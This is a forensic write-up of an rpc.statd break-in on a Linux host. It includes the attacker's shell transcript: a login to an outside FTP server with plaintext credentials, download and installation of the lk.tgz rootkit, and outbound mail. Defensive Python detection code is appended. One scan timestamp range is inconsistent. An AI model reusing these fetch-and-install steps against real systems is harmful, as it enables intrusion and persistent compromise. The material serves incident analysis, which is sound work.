Traffic related to 172.16.1.108

** Time before attack

03/15-11:33:29 - first scan for running sunrpc, returning nothing, originating from 203.111.78.182; the machine was probably down at this moment.
03/15-15:35:55 - another scan for running sunrpc, again nothing found, originating from 211.180.229.190. Probably the machine was not yet up.
03/15-19:34:07...19:34:08 - strange connection to 216.168.224.69:43 (whois service), coming from 172.16.1.108. Apparently this was legitimate traffic, caused by the machine owner (as there was no connection from outside at that moment).

** Here is the attack itself, coming from 211.185.125.124

03/16-03:21:23...16:45:21 - and yet another scan, taking almost a quarter of an hour, but at last it found port 111 open;
03/16-03:21:24 - connection to portmapper, in order to find the port where rpc.statd is running
03/16-03:21:25...03:21:29 - the attack, successful - a shell was opened on port 39168.
03/16-03:21:36 - connection to the shell (port 39168). More about this part is described below.
03/16-03:46:25 - the last activity performed by the attacker on this system
03/16-04:03:27 - last packet received from the attacker's machine.

Transcript of attacker's session.

This part describes the things the attacker did when he connected to port 39168, where a root shell awaited him. His IP was 211.185.125.124 and the operating system was probably Linux. The TTL on incoming packets was 43, which suggests that the attacker was 21 hops away (an initial TTL of 64 minus 43).

211.185.125.124:4450 -> 172.16.1.108:39168

<-> SYN/SYNACK/ACK

/* These commands were sent by the exploit */
-> cd /; uname -a; id;
<- Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
<- uid=0(root) gid=0(root)

/* sleep of 12 minutes, the attacker was probably away from his machine
 *
 * Now he is going to download the rootkit from home.ro. A connection
 * is opened to port 21 on home.ro (193.231.236.41). Most of the
 * information transferred through this connection is below, except
 * for the SYST, TYPE I and PORT 172,16,1,108,4,3 commands. Finally,
 * the connection is terminated with an RST packet. While getting the
 * file, another connection to (resp. 'from', if we want to be completely
 * correct) home.ro is opened (port 20). Home.ro also connected
 * to the compromised machine's auth service (identd). */
-> ftp -v ftp.home.ro
<- Connected to ftp.home.ro.
   220-
   220-
   220-           H O M E . R O
   220-
   220- This server is for HOME.RO members only.
   220- Go to http://www.home.ro/ to register.
   220-
   220- No anonymous access allowed.
   220-
   220-
   220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
-> soane
<- Name (ftp.home.ro:root): 331 Password required for soane.
<- Password:
-> i2ttgcj1d
<- 230 User soane logged in..
-> get lk.tgz
<- Remote system type is UNIX.
   Using binary mode to transfer files
   local: lk.tgz remote: lk.tgz
   200 PORT command successful.
<- 150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
<- 226 Transfer complete..

/* Once again, 8 minutes of doing nothing, then installing the rootkit */
-> bye
<- 520333 bytes received in 35.5 secs (14 Kbytes/sec)
   421 Idle Time out (240 seconds): closing control connection.
-> tar -zxvf lk.tgz
<- last/
<- tar: Archive contains future timestamp 2002-02-08 07:08:13
   last/ssh
   last/pidfile
   last/install
   last/linsniffer
   last/cleaner
   last/inetd.conf
   last/lsattr
   last/services
   last/sense
   last/ssh_config
   last/ssh_host_key
   last/ssh_host_key.pub
   last/ssh_random_seed
   last/sshd_config
   last/sl2
   last/last.cgi
   last/ps
   last/netstat
   last/ifconfig
   last/top
   last/logclear
   last/s
   last/mkfs
-> cd last
-> ./install
<- ********* Instalarea Rootkitului A Pornit La Drum *********

and so on..... The rest of the messages can be found in the rootkit (lk.tgz/install) from SotM 15.

/*
 * In the later phase of rootkit installation, two mails are sent.
 * The first goes to bidi_damm@yahoo.com (sent using mta502.mail.yahoo.com).
 * The other one is not sent, because spf2.us3.outblaze.com doesn't
 * like the specified MAIL FROM: address (root@asdf1).
 * During this process, two connections were made to the auth service
 * (identd) of the compromised machine. The originators of these connections
 * were the two mail servers mentioned above.
 */

ACKFIN/ACK/ACKFIN/ACK
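As an added example that is not part of this analysis, the Python below turns the chain reconstructed above (portmapper query, connection to a port the host does not serve, then an outbound FTP download from the victim) into detection logic over constructed connection records, and also encodes the TTL-to-hop-count estimate used for the attacker's distance. The record format, the host's assumed service baseline, the 60-second correlation window and all source ports except 4450 are assumptions.

```python
import re
from datetime import datetime

VICTIM = "172.16.1.108"
KNOWN_SERVICES = {21, 22, 23, 25, 79, 80, 111, 113, 513, 514}  # assumed host baseline
WINDOW_S = 60  # assumed max gap between a portmapper query and the suspect connect

# Constructed records: the shell connection's time, addresses and port 4450 follow
# the analysis; the other source ports and the FTP/identd timestamps are made up.
SAMPLE_LOG = """\
03/16-03:21:23 211.185.125.124:2002 -> 172.16.1.108:111
03/16-03:21:24 211.185.125.124:2003 -> 172.16.1.108:111
03/16-03:21:36 211.185.125.124:4450 -> 172.16.1.108:39168
03/16-03:33:50 172.16.1.108:1027 -> 193.231.236.41:21
03/16-03:33:51 193.231.236.41:1931 -> 172.16.1.108:113
03/16-03:34:20 193.231.236.41:20 -> 172.16.1.108:1027
"""
LINE_RE = re.compile(r"(\d\d/\d\d-\d\d:\d\d:\d\d) ([\d.]+):(\d+) -> ([\d.]+):(\d+)")

def parse(log):
    """Parse 'MM/DD-HH:MM:SS src:sport -> dst:dport' lines into tuples."""
    records = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%m/%d-%H:%M:%S")
            records.append((ts, m.group(2), int(m.group(3)), m.group(4), int(m.group(5))))
    return records

def find_backdoor_chain(records, victim=VICTIM):
    """Flag a source that queries portmapper and shortly after connects to a port the
    host does not serve (the 39168 root shell), then any outbound FTP control
    connection from the victim after that point (the lk.tgz download)."""
    findings, pmap_seen, compromised_at = [], {}, None
    for ts, src, _sport, dst, dport in records:
        if dst == victim and dport == 111:
            pmap_seen[src] = ts
        elif dst == victim and dport not in KNOWN_SERVICES and src in pmap_seen:
            if (ts - pmap_seen[src]).total_seconds() <= WINDOW_S:
                findings.append(("backdoor-candidate", src, dport, ts))
                compromised_at = compromised_at or ts
        elif src == victim and dport == 21 and compromised_at and ts > compromised_at:
            findings.append(("outbound-ftp-after-compromise", dst, dport, ts))
    return findings

def hops_from_ttl(ttl, initial_ttls=(64, 128, 255)):
    """Nearest common initial TTL minus the observed one: TTL 43 -> 21 hops (start 64)."""
    return min(t for t in initial_ttls if t >= ttl) - ttl

if __name__ == "__main__":
    print(find_backdoor_chain(parse(SAMPLE_LOG)), hops_from_ttl(43))
```

Note that the active-mode FTP data connection (home.ro port 20 to a high port on the victim) also looks like an inbound connection to an unserved port; it is only the correlation with the earlier portmapper query that keeps it from being flagged, so on a busier capture the window and baseline need tuning.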